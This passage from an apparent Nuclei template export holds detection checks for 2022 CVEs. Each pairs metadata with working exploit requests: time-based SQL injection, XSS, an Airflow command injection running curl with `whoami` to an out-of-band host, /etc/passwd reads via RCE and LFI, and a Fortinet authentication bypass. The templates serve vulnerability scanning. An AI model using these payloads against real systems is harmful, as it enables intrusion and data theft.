Injection\n author: r3Y3r53\n severity: critical\n description: |\n SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in 
SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.\n reference:\n - https://www.exploit-db.com/exploits/51273\n - https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40032\n - http://packetstormsecurity.com/files/171739/Simple-Task-Managing-System-1.0-SQL-Injection.html\n - https://www.sourcecodester.com/sites/default/files/download/razormist/Task%20Managing%20System%20in%20PHP.zip\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-40032\n cwe-id: CWE-89\n epss-score: 0.00174\n epss-percentile: 0.54566\n cpe: cpe:2.3:a:simple_task_managing_system_project:simple_task_managing_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: simple_task_managing_system_project\n product: simple_task_managing_system\n tags: cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /task/loginValidation.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n login=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n - 'status_code == 302'\n - \"contains(location, 'login.php')\"\n - 'contains(content_type, \"text/html\")'\n condition: and\n# digest: 4a0a0047304502205adf6288fe87134b556d34fbfea1ed592c7a42950b76ddfbb3c75d90cba774e7022100b0c41e62a09fa680a12f1210778fe7bf97dab393091e9727779d941a9f3a2056:922c64590222798bb761d5b6d8e72950", "hash": "a527e602f04342f43fadfd05421d8883", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": 
{ "$oid": "66477a413521042ccf308589" }, "name": "CVE-2022-40047.yaml", "content": "id: CVE-2022-40047\n\ninfo:\n name: Flatpress < v1.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40047\n - https://github.com/flatpressblog/flatpress/issues/153\n - http://flatpress.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-40047\n cwe-id: CWE-79\n epss-score: 0.00535\n epss-percentile: 0.76696\n cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: flatpress\n product: flatpress\n shodan-query: http.html:\"flatpress\"\n tags: cve,cve2022,flatpress,authenticated,xss,intrusive\nvariables:\n randstring: \"{{to_lower(rand_base(16))}}\"\n\nhttp:\n - raw:\n - |\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}\n\n ------WebKitFormBoundary{{randstring}}\n Content-Disposition: form-data; name=\"user\"\n\n {{username}}\n ------WebKitFormBoundary{{randstring}}\n Content-Disposition: form-data; name=\"pass\"\n\n {{password}}\n ------WebKitFormBoundary{{randstring}}\n Content-Disposition: form-data; name=\"submit\"\n\n Login\n ------WebKitFormBoundary{{randstring}}--\n - |\n GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"flatpress\")'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"onfocus=\\\"alert(document.domain)\")'\n condition: and\n# digest: 
4a0a00473045022100fe7ff33760e6216455b976917c3895164eff5585432a53158db6e362b5c59bc702203d624f6051dbcc168fdd190e57fed04454c628d0500d5dffb611d8b5ec17e4ac:922c64590222798bb761d5b6d8e72950", "hash": "e6a3cd49136db22cdac9d504fd5cdd2f", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858a" }, "name": "CVE-2022-40083.yaml", "content": "id: CVE-2022-40083\n\ninfo:\n name: Labstack Echo 4.8.0 - Open Redirect\n author: pdteam\n severity: critical\n description: |\n Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could lead to phishing attacks and credential theft.\n remediation: Download and install 4.9.0, which contains a patch for this issue.\n reference:\n - https://github.com/labstack/echo/issues/2259\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40083\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n cvss-score: 9.6\n cve-id: CVE-2022-40083\n cwe-id: CWE-601\n epss-score: 0.0212\n epss-percentile: 0.88046\n cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: labstack\n product: echo\n tags: cve,cve2022,redirect,labstack\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}//interactsh.com%2f..\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: location\n regex:\n - '^\\s*//interactsh.com/\\.\\.'\n\n - type: status\n status:\n - 301\n# digest: 4b0a00483046022100fded3edccd5f1179bdb2580cb9d18c97d3dab9ced013e1e822c48bd48ccfb195022100b207d6a21963237237bf2129669404f2fb7e5100b1ae87859f861bbac456db4b:922c64590222798bb761d5b6d8e72950", "hash": 
"437c6ebb0da45263b1538e2c006edd02", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858b" }, "name": "CVE-2022-40127.yaml", "content": "id: CVE-2022-40127\n\ninfo:\n name: AirFlow < 2.4.0 - Remote Code Execution\n author: DhiyaneshDk,ritikchaddha\n severity: high\n description: |\n A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade AirFlow to version 2.4.0 or later to mitigate this vulnerability.\n reference:\n - https://github.com/Mr-xn/CVE-2022-40127\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40127\n - http://www.openwall.com/lists/oss-security/2022/11/14/2\n - https://github.com/apache/airflow/pull/25960\n - https://lists.apache.org/thread/cf132hgm6jvzvsbpsozl3plf1r4cwysy\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-40127\n cwe-id: CWE-94\n epss-score: 0.28782\n epss-percentile: 0.96752\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: apache\n product: airflow\n shodan-query: title:\"Sign In - Airflow\"\n tags: cve,cve2022,airflow,rce,oast,authenticated,apache\n\nhttp:\n - raw:\n - |\n GET /login/ HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /login/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n - |\n @timeout: 15s\n POST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"conf\": {\n \"dag_run\": \"{{randstr}}\"\n },\n \"dag_run_id\": \"id \\\"&& curl 
`whoami`.{{interactsh-url}}\",\n \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'state\": \"queued\"'\n\n - type: word\n part: interactsh_protocol\n words:\n - dns\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf_token\n group: 1\n regex:\n - 'type=\"hidden\" value=\"(.*?)\">'\n internal: true\n# digest: 4a0a004730450220268a6975a87f86a812533542ac7994169de5175872889d429254a91734af5044022100b472c5440cfea767aec326fbd15a942a4d35efcd9f11e527f167068308b38d39:922c64590222798bb761d5b6d8e72950", "hash": "bd1a373b787cb164e20fd3b76bf8fcb0", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858c" }, "name": "CVE-2022-40359.yaml", "content": "id: CVE-2022-40359\n\ninfo:\n name: Kae's File Manager <=1.4.7 - Cross-Site Scripting\n author: edoardottt,daffainfo\n severity: medium\n description: |\n Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2022090057\n - https://code.google.com/archive/p/kfm/downloads\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40359\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-40359\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.46796\n cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: kfm_project\n product: kfm\n tags: cve,cve2022,xss,kfm,kfm_project\n\nhttp:\n - raw:\n - |\n GET /kfm/index.php/' HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"x_kfm_changeCaption\"\n - \"kfm_copyFiles\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220171d85e0f730e64868dee2a05909f6c686e599f48f3696442a181b69884cf50f022100c1f6c50e667cb2eb97f58eadec05e4db8a84fdda96907fa4c22f023609840b63:922c64590222798bb761d5b6d8e72950", "hash": "54c40e5f5d56128b48091ac1e10a3b3c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858d" }, "name": "CVE-2022-4049.yaml", "content": "id: CVE-2022-4049\n\ninfo:\n name: WP User <= 7.0 - Unauthenticated SQLi\n author: theamanrawat\n severity: critical\n description: |\n The WP User WordPress plugin through 
7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n reference:\n - https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be\n - https://wordpress.org/plugins/wp-user/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4049\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4049\n cwe-id: CWE-89\n epss-score: 0.04217\n epss-percentile: 0.92045\n cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 4\n vendor: wp_user_project\n product: wp_user\n framework: wordpress\n publicwww-query: /wp-content/plugins/wp-user/\n tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project\n\nhttp:\n - raw:\n - |\n GET {{path}} HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)\n\n attack: clusterbomb\n payloads:\n path:\n - \"/index.php/user/\"\n - \"/user\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - duration>=6\n - status_code == 200\n - contains(header_2, \"text/html\")\n - contains(body_2, 'Invalid Access')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '\"wpuser_update_setting\":\"([0-9a-zA-Z]+)\"'\n internal: true\n# digest: 4a0a0047304502200bc446290576844df258d034022250c3aa6e8246bb5a19d65fa51e01ba5b35e4022100fc78eae46cc6546539a10fd2ec8828a404ac6f42e58cd5aed957844879de1ed6:922c64590222798bb761d5b6d8e72950", "hash": "3594cfc08ec176706f4c5a7c428fbb15", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858e" }, "name": "CVE-2022-4050.yaml", 
"content": "id: CVE-2022-4050\n\ninfo:\n name: WordPress JoomSport <5.2.8 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Update to JoomSport plugin version 5.2.8 or later.\n reference:\n - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f\n - https://wordpress.org/plugins/joomsport-sports-league-results-management/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4050\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4050\n cwe-id: CWE-89\n epss-score: 0.04713\n epss-percentile: 0.9246\n cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: beardev\n product: joomsport\n framework: wordpress\n tags: cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n mdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-\"}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"jscaruselcont jsview2\")'\n condition: and\n# digest: 
4b0a00483046022100adc5764e0fcc369d16e68be00829b99d4fd95b2241bff1c6ef38c1a561fd9c1c0221008f5d90efe26e0150b8ed5e151209c27ebe6766cc9e70d08983c5696822fa55ce:922c64590222798bb761d5b6d8e72950", "hash": "f3b252eb0931de35c3ea0325baf74f8d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30858f" }, "name": "CVE-2022-4057.yaml", "content": "id: CVE-2022-4057\n\ninfo:\n name: Autoptimize < 3.1.0 - Information Disclosure\n author: DhiyaneshDK\n severity: medium\n description: |\n The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.\n impact: |\n An attacker can gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability.\n reference:\n - https://wpscan.com/vulnerability/95ee1b9c-1971-4c35-8527-5764e9ed64af\n - https://wordpress.org/plugins/autoptimize/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4057\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-4057\n cwe-id: CWE-425\n epss-score: 0.00125\n epss-percentile: 0.46949\n cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: optimizingmatters\n product: autooptimize\n framework: wordpress\n publicwww-query: /wp-content/plugins/autoptimize\n tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html\"\n - \"{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Job id <'\n - 'log messages'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100a0bf6688a368fac230bd01722ccc5ff4a0094c997d4bc9e929424d1b2811d3d6022100dbac1fd1415a66ee1b95e9b5ae6303e3cb1fed954b0b80af47c8665c3c6db65a:922c64590222798bb761d5b6d8e72950", "hash": "40dee9c2f797ea65cb737aaead92bca6", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308590" }, "name": "CVE-2022-4059.yaml", "content": "id: CVE-2022-4059\n\ninfo:\n name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection\n author: r3Y3r53\n severity: critical\n description: |\n The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n remediation: Fixed in version 2.0\n reference:\n - https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4059\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4059\n cwe-id: CWE-89\n epss-score: 0.01515\n epss-percentile: 0.85653\n cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: blocksera\n product: cryptocurrency_widgets_pack\n framework: wordpress\n publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/\n tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_1>=7'\n - 'len(body_1) == 0'\n - 'status_code_1 == 302'\n - 'contains(body_2, \"Cryptocurrency Widgets Pack\")'\n condition: and\n# digest: 
4a0a00473045022100ec787a041969c87a9d0dfe9246ba9dbae1cdddae1fab53af91e2d39f501e35f1022005e07d6858416eed4f65ee7c5b6d8edf6a2538f6550466bd97a1ed559d5fad70:922c64590222798bb761d5b6d8e72950", "hash": "0c23a087b338c284f131a1c46ef4d065", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308591" }, "name": "CVE-2022-4060.yaml", "content": "id: CVE-2022-4060\n\ninfo:\n name: WordPress User Post Gallery <=2.19 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e\n - https://wordpress.org/plugins/wp-upg/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4060\n - https://github.com/im-hanzou/UPGer\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4060\n cwe-id: CWE-94\n epss-score: 0.03753\n epss-percentile: 0.91618\n cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: odude\n product: user_post_gallery\n framework: wordpress\n tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL\"\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: word\n part: body\n words:\n - \"recordsFiltered\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200654ec12187c127abd7ddbeaaa97db5da699aae212f58f56dbdd9b3c3592da7d02205785dd9471edbb3f65c8fc27fb262bbb41ca3ef683dd42409e9fa2622df41348:922c64590222798bb761d5b6d8e72950", "hash": "ba3912a34501fba2b24479bb80e274e2", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308592" }, "name": "CVE-2022-4063.yaml", "content": "id: CVE-2022-4063\n\ninfo:\n name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion\n author: theamanrawat\n severity: critical\n description: |\n WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. 
This, in turn, can enable them to execute code remotely on servers.\n impact: |\n The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.\n remediation: Fixed in version 2.1.4.1.\n reference:\n - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7\n - https://wordpress.org/plugins/inpost-gallery/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4063\n - https://github.com/cyllective/CVEs\n - https://github.com/im-hanzou/INPGer\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4063\n cwe-id: CWE-22\n epss-score: 0.04425\n epss-percentile: 0.92213\n cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: pluginus\n product: inpost_gallery\n framework: wordpress\n tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022001c30dda208f23934117d6648b68a7cbc6063bd9487648f9d3cb3f954c8fb469022100eb1c85cee64fa01d404510e98f5b9c0975e3511b85a8e515435a7dce0084aef8:922c64590222798bb761d5b6d8e72950", "hash": "ad19839f22e743b0e14689894bddac95", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308593" }, "name": "CVE-2022-40684.yaml", "content": "id: CVE-2022-40684\n\ninfo:\n name: Fortinet - Authentication Bypass\n author: Shockwave,nagli,carlosvieira\n severity: critical\n description: |\n Fortinet contains an authentication bypass vulnerability via using an 
alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.\n remediation: |\n Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability.\n reference:\n - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py\n - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/\n - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40684\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-40684\n cwe-id: CWE-287\n epss-score: 0.97217\n epss-percentile: 0.99817\n cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: fortinet\n product: fortiproxy\n tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive\n\nhttp:\n - raw:\n - |\n GET /api/v2/cmdb/system/admin HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Node.js\n Forwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\n X-Forwarded-Vdom: root\n - |\n PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Report Runner\n Content-Type: application/json\n Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\n Content-Length: 610\n\n {\n \"ssh-public-key1\":\"{{randstr}}\"\n }\n\n stop-at-first-match: 
true\n\n matchers-condition: or\n matchers:\n - type: word\n part: body_1\n words:\n - ENC XXXX\n - http_method\n condition: and\n\n - type: word\n part: body_2\n words:\n - Invalid SSH public key.\n - cli_error\n condition: and\n# digest: 4a0a00473045022100ecd342ecd1ddb863f225cc6136e9bc2bee1dd54adfdfe4bd199aae259088ce9902204ae159dde8793d19d05e1809870cd28bb6da2e7a9ce835bdb59a391acfd4000e:922c64590222798bb761d5b6d8e72950", "hash": "935fc3e742e3b1a4cdab970e43296d52", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308594" }, "name": "CVE-2022-40734.yaml", "content": "id: CVE-2022-40734\n\ninfo:\n name: Laravel Filemanager v2.5.1 - Local File Inclusion\n author: arafatansari\n severity: medium\n description: |\n Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution.\n remediation: |\n Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor.\n reference:\n - https://github.com/UniSharp/laravel-filemanager/issues/1150\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40734\n - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966\n - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-40734\n cwe-id: CWE-22\n epss-score: 0.01632\n epss-percentile: 0.86143\n cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: unisharp\n product: laravel_filemanager\n shodan-query: http.html:\"Laravel Filemanager\"\n tags: cve,cve2022,laravel,unisharp,lfi,traversal\n\nhttp:\n - method: GET\n path:\n - 
